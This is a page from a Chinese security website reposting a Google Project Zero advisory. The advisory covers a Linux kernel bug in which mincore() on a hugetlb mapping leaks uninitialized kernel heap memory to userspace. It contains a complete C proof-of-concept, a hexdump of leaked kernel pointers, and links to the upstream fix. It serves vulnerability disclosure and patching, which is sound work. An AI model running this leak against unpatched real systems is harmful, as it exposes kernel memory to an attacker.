首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure 来源：Google Security Research 作者：jannh 发布时间：2017-11-27   /* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1431   I found the following bug with an AFL-based fuzzer:   When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.   This bug can be reproduced with the following testcase: */   $ cat mincore_test.c #define _GNU_SOURCE #include <unistd.h> #include <sys/mman.h> #include <err.h> #include <stdio.h>   unsigned char mcbuf[0x1000];   int main(void) {   if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)     err(1, "mmap");     for (int i=0; i<10000; i++) {     if (mincore((void*)0x86000000, 0x1000000, mcbuf))       perror("mincore");     write(1, mcbuf, 0x1000);   } }   /* $ gcc -o mincore_test mincore_test.c -Wall $ ./mincore_test | hexdump -C | head 00000000  00 00 00 00 00 00 00 00  00 00 00 00 fe 01 00 00  |................| 00000010  80 49 3d 20 c6 e9 ff ff  c0 49 3d 20 c6 e9 ff ff  |.I= .....I= ....| 00000020  00 08 3c 20 c6 e9 ff ff  40 08 3c 20 c6 e9 ff ff  |..< ....@.< ....| 00000030  80 08 3c 20 c6 e9 ff ff  c0 08 3c 20 c6 e9 ff ff  |..< ......< ....| 00000040  00 09 3c 20 c6 e9 ff ff  40 09 3c 20 c6 e9 ff ff  |..< ....@.< ....| 00000050  80 09 3c 20 c6 e9 ff ff  c0 09 3c 20 c6 e9 ff ff  |..< ......< ....| 00000060  00 06 3c 20 c6 e9 ff ff  40 06 3c 20 c6 e9 ff ff  |..< ....@.< ....| 00000070  80 06 3c 20 c6 e9 ff ff  c0 06 3c 20 c6 e9 ff ff  |..< ......< ....| 00000080  00 07 3c 20 c6 e9 ff ff  40 07 3c 20 c6 e9 ff ff  |..< ....@.< ....| 00000090  80 07 3c 20 c6 e9 ff ff  80 78 84 0b c6 e9 ff ff  |..< .....x......|   fixed at https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7c   The fix has landed in the following upstream stable releases: https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.2 https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.13.16 https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.9.65 https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.101   */   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Edge Chakra JIT Inco ·ALLPlayer 7.5 - Local Buffer O ·Microsoft Edge Chakra JIT Inli ·Exim 4.89 - 'BDAT' Denial of S ·Microsoft Edge Chakra JIT Glob ·KMPlayer 4.2.2.4 - Denial of S ·Microsoft Edge Chakra JIT Bail ·Winamp Pro 5.66.Build.3512 - D ·D-Link DIR-850L Credential Dis ·Android Gmail < 7.11.5.1765680 ·WebKit - 'WebCore::FormSubmiss ·pfSense 2.3.1_1 Remote Command   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved